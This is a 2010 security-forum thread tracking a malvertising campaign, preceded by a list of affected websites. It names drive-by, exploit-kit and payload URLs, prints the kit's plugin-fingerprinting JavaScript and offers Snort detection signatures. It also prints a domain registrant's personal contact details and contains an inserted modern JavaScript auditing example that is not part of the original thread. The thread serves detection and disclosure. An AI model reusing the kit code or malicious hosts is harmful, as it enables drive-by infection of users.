lumberjocks.com
macombdaily.com
mainlinemedianews.com
mediatakeout.com
middletownpress.com
moneycentral.msn.com
movies.msn.com
msn.foxsports.com
mylifeisaverage.com
nashvillecitypaper.com
nbcsports.msnbc.com
nhregister.com
obituaries.citizen-times.com
ouinsider.com
oxygen.com
photos.indystar.com
php.app.com
pioneer.olivesoftware.com
pqasb.pqarchiver.com
pubads.g.doubleclick.net
ratemyprofessors.com
saratogian.com
sec.todaysthv.com
svc1.m5prod.net
tag.admeld.com
thedailywh.at
the.honoluluadvertiser.com
topix.cachefly.net
trentonian.com
troyrecord.com
tv.msn.com
webmail.peoplepc.com
www.13wmaz.com
www.49erswebzone.com
www.9news.com
www.apartments.com
www.app.com
www.argusleader.com
www.azcentral.com
www.barnesandnoble.com
www.baxterbulletin.com
www.bigeasyclassifieds.com
www.calgarysun.com
www.captivate.com
www.cars.com
www.casttv.com
www.charter.net
www.chillicothegazette.com
www.citizen-times.com
www.clarionledger.com
www.cnweekly.com
www.coshoctontribune.com
www.courier-journal.com
www.courierpostonline.com
www.crimsonconfidential.com
www.dailyfreeman.com
www.dailylocal.com
www.dailyrecord.com
www.dailyworld.com
www.darkroastedblend.com
www.delawareonline.com
www.delcotimes.com
www.delmarvanow.com
www.democratandchronicle.com
www.desmoinesregister.com
www.excite.com
www.federaltimes.com
www.fishexplorer.com
www.floridatoday.com
www.fox5vegas.com
www.freep.com
www.greatfallstribune.com
www.greenandwhite.com
www.greenbaypressgazette.com
www.guampdn.com
www.hawaiinavynews.com
www.heritage.com
www.heritagenews.com
www.honoluluadvertiser.com
www.huffingtonpost.com
www.india-forums.com
www.lansingstatejournal.com
www.legacy.com
www.lohud.com
www.macombdaily.com
www.mainlinemedianews.com
www.mentalfloss.com
www.middletownpress.com
www.montgomeryadvertiser.com
www.morningjournal.com
www.mycentraljersey.com
www.nashuatelegraph.com
www.neogaf.com
www.news-herald.com
www.newsleader.com
www.news-press.com
www.nextdaypets.com
www.nhregister.com
www.oneidadispatch.com
www.overclockersclub.com
www.portclintonnewsherald.com
www.pottsmerc.com
www.pottstownmercury.com
www.press-citizen.com
www.pressconnects.com
www.prosportsdaily.com
www.racingjunk.com
www.rawstory.com
www.registercitizen.com
www.rgj.com
www.saratogian.com
www.speedwaymedia.com
www.stevenspointjournal.com
www.tallahassee.com
www.televisionwithoutpity.com
www.tennessean.com
www.tetongravity.com
www.theadvertiser.com
www.thecalifornian.com
www.theithacajournal.com
www.themorningsun.com
www.thenewsstar.com
www.thereporteronline.com
www.thespectrum.com
www.thetimesherald.com
www.timesherald.com
www.tmnews.com
www.tomshardware.com
www.trentonian.com
www.troyrecord.com
www.universalsports.com
www.usanetwork.com
www.visaliatimesdelta.com
www.wausaudailyherald.com
www.wbir.com
www.wisconsinrapidstribune.com
www.worldtimeserver.com
www.wtsp.com
www.wusa9.com
www.zanesvilletimesrecorder.com
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: eoin.miller on May 14, 2010, 10:32:17 pm
This has been tossed over to US-CERT, DShield/SANS and MS. Hopefully these guys can get rooted out of the affiliate networks quickly.
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: SysAdMini on May 14, 2010, 11:30:33 pm
Someone sent us this URL by contact form.

Code:
http://adnet.media.unwited.com/cr/j/cd/?rt=47210&sid=2421828&m=5171&ts=31&d=x&ctc=31&tm=sc
URL format looks exactly like the one from adnet.media.roxantb.com. I don't see any redirection to a malware URL.
Obfuscated code contains a link to bestwestern.com.
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: SysAdMini on May 14, 2010, 11:44:01 pm
also reported today

Code:
adnet.media.prananc.com/b/jx/cd/?rq=103193&sid=215411720&m=714&tn=4&d=s&ct=1&t=s
adnet.media.ditent.com/bn/j/cd/?rq=104192&sid=9472394&m=514&tn=7&d=s&ct=1&t=s
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: eoin.miller on May 17, 2010, 04:38:19 pm
Quote
Someone sent us this URL by contact form.

Code:
http://adnet.media.unwited.com/cr/j/cd/?rt=47210&sid=2421828&m=5171&ts=31&d=x&ctc=31&tm=sc
URL format looks exactly like the one from adnet.media.roxantb.com. I don't see any redirection to a malware URL.
Obfuscated code contains a link to bestwestern.com.

Domain is definitely malicious and actively being seen on our network. I've seen it not include the malicious URLs sometimes, not sure why really. Obfuscated JavaScript leads the client to the following exploit kit URLs, in order, in the sample we have looked at:

http://phicruss.com/cust.php?n=cust2
http://bbnhs.com/c/index.php

JS Unpack Report for URL http://adnet.media.unwited.com/cr/j/cd/?rt=47210&sid=2421828&m=5171&ts=31&d=x&ctc=31&tm=sc:
http://jsunpack.jeek.org/dec/go?report=b39fc1948d85cbd5b96bee1ee078ea2b432bbe59

They flipped to the 178.162.133.0/24 netblock on 5-14-10 @15:00 UTC. Luckily this is only for the advertising server hosting the JavaScript that is redirecting. The domains still being served up currently go to the other previously mentioned netblocks (188.72.192.0/24, 194.8.250.0/24). Most advertising now seems to be referred by Yahoo! web mail services. hooray.
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: Kimberly on May 18, 2010, 06:24:37 am
Quote
This has been tossed over to US-CERT, DShield/SANS and MS. Hopefully these guys can get rooted out of the affiliate networks quickly.
Correction: US-CERT & SANS and DShield. MS still has nothing and they are the only ones who can do something about it.

Quote
Most advertising now seems to be referred by Yahoo! web mail services. hooray
Yeah, so what about those victims? Got any PCAPs of going through Yahoo, as I have contacts in every advertising network and that way is faster than SANS (it's not even their business)?

Imagine how many more people have been infected because you send stuff to the wrong people?
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: eoin.miller on May 18, 2010, 03:12:27 pm
Quote
This has been tossed over to US-CERT, DShield/SANS and MS. Hopefully these guys can get rooted out of the affiliate networks quickly.
Correction: US-CERT & SANS and DShield. MS still has nothing and they are the only ones who can do something about it.

Quote
Most advertising now seems to be referred by Yahoo! web mail services. hooray
Yeah, so what about those victims? Got any PCAPs of going through Yahoo, as I have contacts in every advertising network and that way is faster than SANS (it's not even their business)?

Imagine how many more people have been infected because you send stuff to the wrong people?

The handlers at these various organizations told me they are disseminating the information appropriately to the correct places. If you wish to furnish me with direct contacts at any of these organizations, I will talk to them directly about it and provide any information I have to help stop it. I do not send out PCAPs of my clients' data to unknown sources via web forums, even after I have taken the time to sanitize them. This isn't my first rodeo.

And FYI, SANS is part of the co-op that is DShield.

http://www.dshield.org/
http://isc.sans.org/

Look similar?
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: eoin.miller on May 24, 2010, 06:35:43 pm
FYI, this is still running pretty rampant, watching people get referred from sites like open.ad.yieldmanager.net:

Quote
HTTP/1.1 200 OK
Date: Mon, 24 May 2010 14:43:12 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV T
AI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI
PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Connection: close
Transfer-Encoding: chunked
Content-Type: application/x-multiad-json; charset=UTF-8
Content-Length: 10536
(function(){

var multiAdPack = {
"encoding":"UTF-8",
"version":"1.1",
"reqtype":"ac",
"ads":[
{"ad":"<!-- SpaceID=2022775850 loc=AP37 noad -->\u000a<img style=\"display:none\"
 width=0 height=0 alt=\"\" src=\"http://us.bc.yahoo.com/b?P=ae0af71a-6742-11df-bf
5f-bf408f606688&T=19d2poc7s%2fX%3d1274712193%2fE%3d2022775850%2fR%3dncnws%2fK%3d5
%2fV%3d8.1%2fW%3d0%2fY%3dPARTNER_US%2fF%3d2921782211%2fH%3dYWx0c3BpZD0iOTY3MjgzMT
UxIiBzZXJ2ZUlkPSJhZTBhZjcxYS02NzQyLTExZGYtYmY1Zi1iZjQwOGY2MDY2ODgiIHNpdGVJZD0iODI
4NTUxIiB0U3RtcD0iMTI3NDcxMjE5Mjk4NTUwMiIgdGFyZ2V0PSJfYmxhbmsiIA--%2fQ%3d-1%2fS%3d
1%2fJ%3d29558862&U=128h7uej0%2fN%3djLRSIkwNiZE-%2fC%3d-1%2fD%3dAP37%2fB%3d-1%2fV%
3d5\"><script>// no ads\u000a</script><!--flv has invalid value--><!--rTg has inv
alid value--><!--rTg has invalid value--><!--XCH|ae0af71a-6742-11df-bf5f-bf408f60
6688--><!--fac9.cl1.ads.adx.ac4.yahoo.com-->",
 "type":"text/html",
 "id":"0",
 "size":["160x90"],
 "slug":false,
 "secure":false},
{"ad":"<script language=\"javascript\" src=\"hXXp://adnet.media.unwited.com/cr/j/
cd/?rt=47210&sid=2421828&m=5171&ts=31&d=x&ctc=31&tm=sc
\">\u000d\u000d</script>\u0
00d\u000d<noscript>\u000d\u000d<a href=\"http://us.ard.yahoo.com/SIG=15vmvpbvl/M=
600742873.600772841.409311541.408347572/D=ncnws/S=2022775850:N/Y=PARTNER_US/L=ae0
af71a-6742-11df-bf5f-bf408f606688/B=j7RSIkwNiZE-/J=1274712193000950/K=33yOa_MgRUm
ArzkSIRRKYQ/EXP=1274719393/A=1757979682871089560/R=0/X=2/SIG=12t964gb2/*http://ad
net.media.unwited.com/cr/j/clk/?rt=47210&sid=2421828&m=5171&ts=31&d=x&ctc=31&tm=s
c\" target=\"_top\">\u000d\u000d<img src=\"http://adnet.media.unwited.com/cr/j/vi
ew/?rt=47210&sid=2421828&m=5171&ts=31&d=x&ctc=31&tm=sc\" width=728 height=90 bord
er=0>\u000d\u000d</a>\u000d\u000d</noscript><img style=\"display:none\" width=0 h
eight=0 alt=\"\" src=\"http://us.bc.yahoo.com/b?P=ae0af71a-6742-11df-bf5f-bf408f6
06688&T=19c202ntl%2fX%3d1274712193%2fE%3d2022775850%2fR%3dncnws%2fK%3d5%2fV%3d8.1
%2fW%3d0%2fY%3dPARTNER_US%2fF%3d293944772%2fH%3dYWx0c3BpZD0iOTY3MjgzMTUxIiBzZXJ2Z
UlkPSJhZTBhZjcxYS02NzQyLTExZGYtYmY1Zi1iZjQwOGY2MDY2ODgiIHNpdGVJZD0iODI4NTUxIiB0U3
RtcD0iMTI3NDcxMjE5Mjk4NTUwMiIgdGFyZ2V0PSJfYmxhbmsiIA--%2fQ%3d-1%2fS%3d1%2fJ%3d295
58862&U=13raiokei%2fN%3dj7RSIkwNiZE-%2fC%3d600742873.600772841.409311541.40834757
2%2fD%3dN%2fB%3d1757979682871089560%2fV%3d2\"><!--flv has invalid value--><!--rTg
 has invalid value--><!--rTg has invalid value--><!--MME--><!--TRK:a:175797968287
1089560,m:600742873.600772841.409311541.408347572-->",
 "type":"text/html",
 "id":"1",
 "size":["728x90"],
 "slug":false,
 "secure":false},
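The response quoted above is a JSONP-style multiAdPack: a JavaScript wrapper around a JSON object whose ads[].ad fields are HTML strings, and the malicious slot is the one whose HTML carries an external <script src> pointing at adnet.media.unwited.com (defanged as hXXp in the post). The following is an added example, not code from the thread or from Yahoo: it extracts the object, parses each slot's HTML for src/href resources, undoes the hXXp defanging, unwraps the "/*http://..." landing page that the click-tracking href carries, and reports which resources fall outside the domains the publisher expects to serve its ads. The response body below is constructed to mirror the quoted format, and the yahoo.com allowlist is an assumption.

```javascript
// Added example (not from the thread): audit a multiAdPack response for ad slots
// that load resources from outside the expected ad-serving domains.
// SAMPLE_RESPONSE is constructed to mirror the quoted format; the allowlist is an assumption.

const EXPECTED_AD_DOMAINS = ['yahoo.com']; // assumption: the publisher's own ad infrastructure

// Assumption: last two labels are the registrable domain (use the Public Suffix List in production).
function registrableDomain(host) {
  return host.toLowerCase().split('.').slice(-2).join('.');
}

// The body is  (function(){ var multiAdPack = {...}; ... })();  so grab the object literal.
function extractAdPack(body) {
  const m = /var\s+multiAdPack\s*=\s*(\{[\s\S]*?\})\s*;/.exec(body);
  if (!m) throw new Error('no multiAdPack object found');
  return JSON.parse(m[1]);
}

// src= / href= attributes on script, img, a and iframe tags in one slot's HTML.
// 'hXXp' defanging is undone so URL() can parse the value.
function resourceUrls(html) {
  const out = [];
  const re = /<(script|img|a|iframe)\b[^>]*?\s(?:src|href)\s*=\s*"([^"]+)"/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    const url = m[2].replace(/^hxxps?:/i, (s) => s.replace(/xx/i, 'tt'));
    out.push({ tag: m[1].toLowerCase(), url });
  }
  return out;
}

function auditAdPack(body) {
  const findings = [];
  const note = (slot, tag, url) => {
    let host;
    try { host = new URL(url).hostname; } catch (e) { return; } // relative or junk value
    findings.push({ slot, tag, host, url,
      external: !EXPECTED_AD_DOMAINS.includes(registrableDomain(host)) });
  };
  for (const slot of extractAdPack(body).ads) {
    for (const { tag, url } of resourceUrls(slot.ad)) {
      note(slot.id, tag, url);
      // The click-tracking href carries the real landing page after "/*".
      const star = url.indexOf('/*http');
      if (star !== -1) note(slot.id, tag + ':redirect', url.slice(star + 2));
    }
  }
  return findings;
}

// Constructed response: slot 0 is a house "noad" pixel, slot 1 carries the external script.
const SAMPLE_RESPONSE = [
  '(function(){',
  'var multiAdPack = {',
  '"encoding":"UTF-8","version":"1.1","reqtype":"ac",',
  '"ads":[',
  '{"ad":"<!-- SpaceID=2022775850 loc=AP37 noad -->\\u000a<img style=\\"display:none\\" width=0 height=0 alt=\\"\\" src=\\"http://us.bc.yahoo.com/b?P=example\\">",',
  ' "type":"text/html","id":"0","size":["160x90"],"slug":false,"secure":false},',
  '{"ad":"<script language=\\"javascript\\" src=\\"hXXp://adnet.media.unwited.com/cr/j/cd/?rt=47210&sid=2421828\\">\\u000d</script>' +
    '<noscript><a href=\\"http://us.ard.yahoo.com/SIG=example/*http://adnet.media.unwited.com/cr/j/clk/?rt=47210\\" target=\\"_top\\">' +
    '<img src=\\"http://adnet.media.unwited.com/cr/j/view/?rt=47210\\" width=728 height=90 border=0></a></noscript>",',
  ' "type":"text/html","id":"1","size":["728x90"],"slug":false,"secure":false}',
  ']};',
  'multiAdPack.render && multiAdPack.render();',
  '})();',
].join('\n');

console.log(JSON.stringify(auditAdPack(SAMPLE_RESPONSE).filter((f) => f.external), null, 2));
```

Running this against the constructed body reports three external resources, all on adnet.media.unwited.com: the script tag, the click redirect hidden inside the us.ard.yahoo.com href, and the fallback image. On a real capture the interesting finding is the script, since that is the element the browser executes on page load.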
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: eoin.miller on May 25, 2010, 04:22:27 pm
nertonic.com

Drive-by:
http://nertonic.com/9bc16b427vc52/

PDF:
http://nertonic.com/657fs76fg87vc9/840099943
http://wepawet.iseclab.org/view.php?hash=744420e7136af84acdcbb12dd970b188&type=js

Java:
http://nertonic.com/657fs76fg87vc9/B0.php

Payload:
http://nertonic.com//657fs76fg87vc9/6875643787820
Detected as Win32/Fainli.A by Microsoft Security Essentials

Check-in post-infection:
antispyware-scan.com
antispyware-scan.net

Getting referred to by ad.doubleclick.net

Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: Moore on May 30, 2010, 11:00:09 am
Quote
FYI, this is still running pretty rampant
Because you still can't be bothered to send the details to the right people, that's what happens, rodeo guy.

YOU could have helped to stop this a lot earlier, instead you just want to keep playing your little games.
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: Kimberly on May 30, 2010, 11:01:09 am
FYI, I know that DShield is part of SANS and FYI we got their blocklist available for download at Bluetack.

Microsoft still has NO information from SANS or Dshield, as reported by my contacts at AdCenter / Traffic Quality Team. Just FYI, they found several other malvertisement campaigns even with the few details I was able to provide because you wanted to play the smart way.
http://stopmalvertising.com/malvertisements/alert-new-curves-malvertisement

And NO, I don't hand out my contacts from Microsoft AdCenter, Yahoo or Google / Doubleclick to rodeo kids.

You had the elements in hand to stop these campaigns but they are still running and even more malvertisement domains have been discovered.
http://msmvps.com/blogs/spywaresucks/archive/2010/05/30/1770473.aspx

Happy now?
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: Kimberly on May 30, 2010, 02:37:13 pm
I've alerted my contact at Yahoo about the adnet.media.unwited.com incident. On which site is that malvertisement displayed, or is that again top secret too?
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: Kimberly on May 31, 2010, 06:05:30 pm
Yahoo, without any pertinent information again, took out 3 malvertisements. There might be more ....
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: eoin.miller on June 02, 2010, 02:59:33 pm
Quote
And NO, I don't hand out my contacts from Microsoft AdCenter, Yahoo or Google / Doubleclick to rodeo kids.

Good for you, then keep helping the bad guys out.

Additionally if you have nothing to actually contribute to the thread that is pertinent, it is best to stay out of it.

Quote
Yahoo, without any pertinent information again, took out 3 malvertisements. There might be more ....

Then they obviously haven't taken any time to read what I post in public or bothered to contact me. I've got a bunch more, but I think I'll stop publishing that we find it and keep it to ourselves.
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: Kimberly on June 02, 2010, 03:52:31 pm
For over the last 4-5 years I've spent most of my time, if not all, on reporting malware.

Actually FYI, Yahoo / Right Media took out more since my last post as I have been continuously in contact with the incident team. I have the exact number of incidents which I can't disclose in public unfortunately.

Quote
Good for you, then keep helping the bad guys out.

Yeah, sure .... that's exactly what you're doing by sending the information to the wrong people and blaming me for it. Keep doing what you do and we'll see how fast something gets pulled out of an ads network.

We see guys like you all the time ... showboat ponies ...
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: eoin.miller on June 02, 2010, 04:25:43 pm
Quote
For over the last 4-5 years I've spent most of my time, if not all, on reporting malware.

And maybe in those multiple years you would realize that shoving copies of PCAPs around to random people on web forums can lead to termination and prosecution for violating all the security controls we have to comply with under FISMA. I'm not sending you my clients' pcaps regardless, so stop asking.
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: cleanmx on June 02, 2010, 04:35:05 pm
Quote
For over the last 4-5 years I've spent most of my time, if not all, on reporting malware.

And maybe in those multiple years you would realize that shoving copies of PCAPs around to random people on web forums can lead to termination and prosecution for violating all the security controls we have to comply with under FISMA. I'm not sending you my clients' pcaps regardless, so stop asking.


hi Kimberly, hi eoin,

please slow down a bit .... both sides.... Publishing pcaps in public is bad... but I guess Kimberly made a mistake...


-- gerhard
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: eoin.miller on June 02, 2010, 04:48:27 pm
Quote
FYI, this is still running pretty rampant
Because you still can't be bothered to send the details to the right people, that's what happens, rodeo guy.

YOU could have helped to stop this a lot earlier, instead you just want to keep playing your little games.

Yea, it is not the lack of proper vetting within the business process of adding new advertising affiliates. Well, that and a complete lack of major advertising organizations following their own redirects to their affiliates constantly to observe if they are serving up malware and drive bys.

It isn't like we aren't sharing a common goal, but apparently by producing to the community what is going on without risking the data of my clients, or my own job, makes you somehow blame me for the malvertising campaigns I take the time to research and disclose. All the while you continuously refuse to provide any channels or contacts that you claim to know exist to report this information to directly. Both of you completely lack the understanding of what is required to disclose traffic from my client to any other organization.

That's as nice as I am going to put it. Stay out of the thread unless you have actual pertinent information regarding domains to be added to the list. If you have some more personally oriented snipes to try and send, take it to PM. That is why it is there.

Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: Kimberly on June 02, 2010, 05:28:33 pm
Quote
Publishing pcaps in public is bad... but I guess Kimberly made a mistake...
I didn't post a complete capture including affiliate ID's in this topic ....

BTW, you can strip out confidential information about websites and/or clients, just leaving in the necessary info to identify the malicious ad before handing them over to anyone, that includes official institutions or advertising networks.
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: eoin.miller on June 02, 2010, 07:54:31 pm
Quote
Publishing pcaps in public is bad... but I guess Kimberly made a mistake...
I didn't post a complete capture including affiliate ID's in this topic ....

BTW, you can strip out confidential information about websites and/or clients, just leaving in the necessary info to identify the malicious ad before handing them over to anyone, that includes official institutions or advertising networks.

Affiliate ID's and domains don't matter to my client, data being POST'd back to servers after exploitation does. I post the affiliate ID's and domains so that they will become known and public so people can block them as we do. I will not be disclosing full PCAPs of my client to you so stop bringing it up.

Is this seriously the type of conduct that is deemed acceptable on this board?
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: MysteryFCM on June 03, 2010, 01:07:06 pm
Can we all calm down and put this issue to rest please. I won't allow this behaviour to continue.

We're all on the same side here and meant to be helping each other take the bad guys down. If someone doesn't wish to share contacts or data then fine, that is up to them (and as far as pcaps, most corps don't allow those to be shared publicly, or indeed privately, for obvious security reasons, stripped out or otherwise), just contact me and I'll help find the appropriate contact for you.
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: moranned on June 05, 2010, 09:32:39 pm
thanks to Steve for mediating this. agreed that we are all on the same team here.
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: eoin.miller on June 10, 2010, 05:42:12 pm
More drive bys:

hgptd.com

http://hgptd.com/g/index.php


Redirected from:
zherlova1388.newmail.ru/ypypumu.html
puaho.notlong.com
graudin4.nm.ru/ixywesuw.html
dolieb.notlong.com
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: eoin.miller on June 11, 2010, 02:54:04 pm
More redirects to the baddie domains:

http://ir.pe/2c3o

**EDIT**

Apparently this ir.pe is just some sort of URL redirection service in Spanish.
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: eoin.miller on June 21, 2010, 05:43:54 pm
More still ongoing:

Ad servers:
view.atdmt.com.daxitymb.com
media.fastclick.net.tribudd.com
view.atdmt.com.cidersi.com
ad.doubleclick.net.wifell.com
adnet.media.intati.com

Seeing most of the ad services over in the 95.143.193.0/24 net now. Still redirecting clients to the known bad networks full of drive bys.

Those above malvertising domains will toss you to a stats/check in site:

Check in for stats tracking:
http://generalline.co.cc/rss.php?n=cust11

Eventually redirects you over to the actual drive by (we are supposing here as we block the destination nets on our networks):

Drive bys examples:
http://uprtx.com/rbds/mh_t.php


Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: moranned on June 22, 2010, 01:06:23 am
if this campaign follows patterns displayed by the last campaign the next exploit domains will be:

Hjoty.com   
Bumzc.com   
Potyur.com   
Palcaug.com   
Uoptyr.com   
Uprtx.com
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: eoin.miller on June 22, 2010, 05:06:05 pm
Been working on a Snort sig to track the big malvertising campaigns responsible for most of our favorite FakeAV installs. The servers return a common form of JavaScript compression commonly used by jQuery and also used by Google and others. Luckily, the servers from Google and others are not normally nginx, and the ones that are nginx are serving up the JavaScript with the correct Content-Type instead of text/html. So based on that we created this sig and have had a pretty low FP rate for the last day or so, which has helped us identify the malvertising servers and add them to the egress filters.

Code: [Select]
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"MALVERTISING eval(function(p,a,c,k,e,d) JavaScript from nginx Detected"; flow:established,to_client; content:"Server\: nginx"; nocase; offset:15; depth:15; content:"Content-Type\: text/html"; nocase; distance:20; content:"eval(function(p,a,c,k,e,d)"; nocase; distance:50; classtype:bad-unknown; sid:5600046; rev:1;)
Sample packet payload:
Code: [Select]
00000245  48 54 54 50 2f 31 2e 31  20 32 30 30 20 4f 4b 0d HTTP/1.1  200 OK.
00000255  0a 53 65 72 76 65 72 3a  20 6e 67 69 6e 78 2f 30 .Server:  nginx/0
00000265  2e 37 2e 36 35 0d 0a 44  61 74 65 3a 20 4d 6f 6e .7.65..D ate: Mon
00000275  2c 20 32 31 20 4a 75 6e  20 32 30 31 30 20 31 33 , 21 Jun  2010 13
00000285  3a 32 39 3a 34 35 20 47  4d 54 0d 0a 43 6f 6e 74 :29:45 G MT..Cont
00000295  65 6e 74 2d 54 79 70 65  3a 20 74 65 78 74 2f 68 ent-Type : text/h
000002A5  74 6d 6c 0d 0a 54 72 61  6e 73 66 65 72 2d 45 6e tml..Tra nsfer-En
000002B5  63 6f 64 69 6e 67 3a 20  63 68 75 6e 6b 65 64 0d coding:  chunked.
000002C5  0a 43 6f 6e 6e 65 63 74  69 6f 6e 3a 20 6b 65 65 .Connect ion: kee
000002D5  70 2d 61 6c 69 76 65 0d  0a 58 2d 50 6f 77 65 72 p-alive. .X-Power
000002E5  65 64 2d 42 79 3a 20 50  48 50 2f 35 2e 32 2e 31 ed-By: P HP/5.2.1
000002F5  33 0d 0a 0d 0a 66 37 32  0d 0a 65 76 61 6c 28 66 3....f72 ..eval(f
00000305  75 6e 63 74 69 6f 6e 28  70 2c 61 2c 63 2c 6b 2c unction( p,a,c,k,
00000315  65 2c 64 29 7b 65 3d 66  75 6e 63 74 69 6f 6e 28 e,d){e=f unction(
00000325  63 29 7b 72 65 74 75 72  6e 28 63 3c 61 3f 27 27 c){retur n(c<a?''
00000335  3a 65 28 70 61 72 73 65  49 6e 74 28 63 2f 61 29 :e(parse Int(c/a)
00000345  29 29 2b 28 28 63 3d 63  25 61 29 3e 33 35 3f 53 ))+((c=c %a)>35?S
00000355  74 72 69 6e 67 2e 66 72  6f 6d 43 68 61 72 43 6f tring.fr omCharCo
00000365  64 65 28 63 2b 32 39 29  3a 63 2e 74 6f 53 74 72 de(c+29) :c.toStr
00000375  69 6e 67 28 33 36 29 29  7d 3b 69 66 28 21 27 27 ing(36)) };if(!''
00000385  2e 72 65 70 6c 61 63 65  28 2f 5e 2f 2c 53 74 72 .replace (/^/,Str
00000395  69 6e 67 29 29 7b 77 68  69 6c 65 28 63 2d 2d 29 ing)){wh ile(c--)
000003A5  7b 64 5b 65 28 63 29 5d  3d 6b 5b 63 5d 7c 7c 65 {d[e(c)] =k[c]||e
000003B5  28 63 29 7d 6b 3d 5b 66  75 6e 63 74 69 6f 6e 28 (c)}k=[f unction(
000003C5  65 29 7b 72 65 74 75 72  6e 20 64 5b 65 5d 7d 5d e){retur n d[e]}]


Submitted it over to the guys over at ET (EmergingThreats) so it may be in future releases if it is deemed worthy.
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: eoin.miller on June 22, 2010, 10:04:40 pm
Quote
if this campaign follows patterns displayed by the last campaign the next exploit domains will be:

Hjoty.com
Bumzc.com
Potyur.com
Palcaug.com
Uoptyr.com
Uprtx.com

Definitely, they all resolve to be within the 194.8.250.0/24 netblock. The drive by domains will flip around inside that netblock every couple of weeks or so.

Some of the other check-in sites for stats are:
jahsgdqtuz.co.cc
generalline.co.cc


New malvertising sites:
view.atdmt.com.landsm.com
media.rseeting.com


New payload/malware sites:
http://nwsplt.com/pqmmh/_dwfxw.php

***EDIT***

Looks like if the URL has already been visited, it redirects the client to Google.com, based upon whether the client IP has already made the request before.
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: moranned on June 22, 2010, 10:33:16 pm
Eoin, thanks for keeping us all up to date on this and putting together a snort sig to detect these campaigns.

the earlier campaign hosts what appears to be SEO Sploit packs on 194.8.250.60.

this most recent outbreak is also hosting what appear to be SEO Sploit packs on 194.8.250.15.

All the exploit domains in both campaigns are registered to:

Pat Casey
patcasey@xhotmail.com
+1.7149214718
fax: +1.7149214718
1201 E. Candlewood
Orange CA 92867
us

I've observed a cocktail of Bamital, TDSS, and Rogue AV dropped during these campaigns.
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: eoin.miller on June 23, 2010, 05:33:06 pm
Just trying to give as much as I get from everyone else who contributes!  :)

Check-in:
webclickst.co.cc

Drive-by:
fjoty.com

Malicious PDF:
http://fjoty.com/pw/hxnrgy/ghyv.pdf

Keep seeing the URL's rotate, might be time based?
http://fjoty.com/jz/cvra.php
http://fjoty.com/pw/za_pumsvx.php


When you load the page the first time, you get this back:

Code: [Select]
<html>
<body>
<script>
document.write('<form action="za_pumsvx.php" method="post"><input type="hidden" name="id" value="" />');
var id="adbac98ea8cc4816ae7652f9ade94ac6&n";
if(navigator.javaEnabled())
{
id="adbac98ea8cc4816ae7652f9ade94ac6&j";
}
for(var i=0;i<navigator.plugins.length;i++)
{
if(navigator.plugins[i].description.indexOf("Adobe Acrobat")!=-1)
{
id=id+"p";
break;
}
if(navigator.plugins[i].description.indexOf("Adobe PDF")!=-1)
{
id=id+"p";
break;
}
}
var f=document.forms[0];
f.id.value=id;
f.submit();
</script>
</body>
</html>


It enumerates the browser plugins and POST's back that info to the server which picks the exploit to serve up. So you would have a POST like this coming back from the client after executing the above JavaScript:

Code: [Select]
POST /pw/za_pumsvx.php HTTP/1.1
Host: fjoty.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fjoty.com/pw/za_pumsvx.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 40

id=adbac98ea8cc4816ae7652f9ade94ac6%26np

I am going to try and get some more traffic from this and see how easy it may be to sig the POST from the client. The id= sticks out pretty easy, I just don't think it is consistent because the server appears to go off of the length of the random string to determine which exploits to serve up. Should be able to sig it with a little regex though.

***EDIT***

Here is a rough Snort sig with minimal testing for clients POST'ing to the SEO Exploit kits to get themselves some malicious Java or PDF's:

Code: [Select]
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"MALVERTISING POST to SEO Exploit Kit"; flow:established,to_server; content:"POST "; depth:5; nocase; content:".php HTTP"; nocase; distance:0; pcre:"/id=[a-f0-9]{32}(&|%26)(np|jp|n|j)/iR"; classtype:bad-unknown; sid:5600047; rev:2;)
This should help track people who have been exploited by the PDF from the drive by:
Code: [Select]
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"MALVERTISING Adobe Exploited Check-In"; flow:established,to_server; content:"GET "; nocase; depth:4; uricontent:".php?&&reader_version="; nocase; classtype:trojan-activity; sid:5600048; rev:1;)
Sig developed from the following wepawet report:
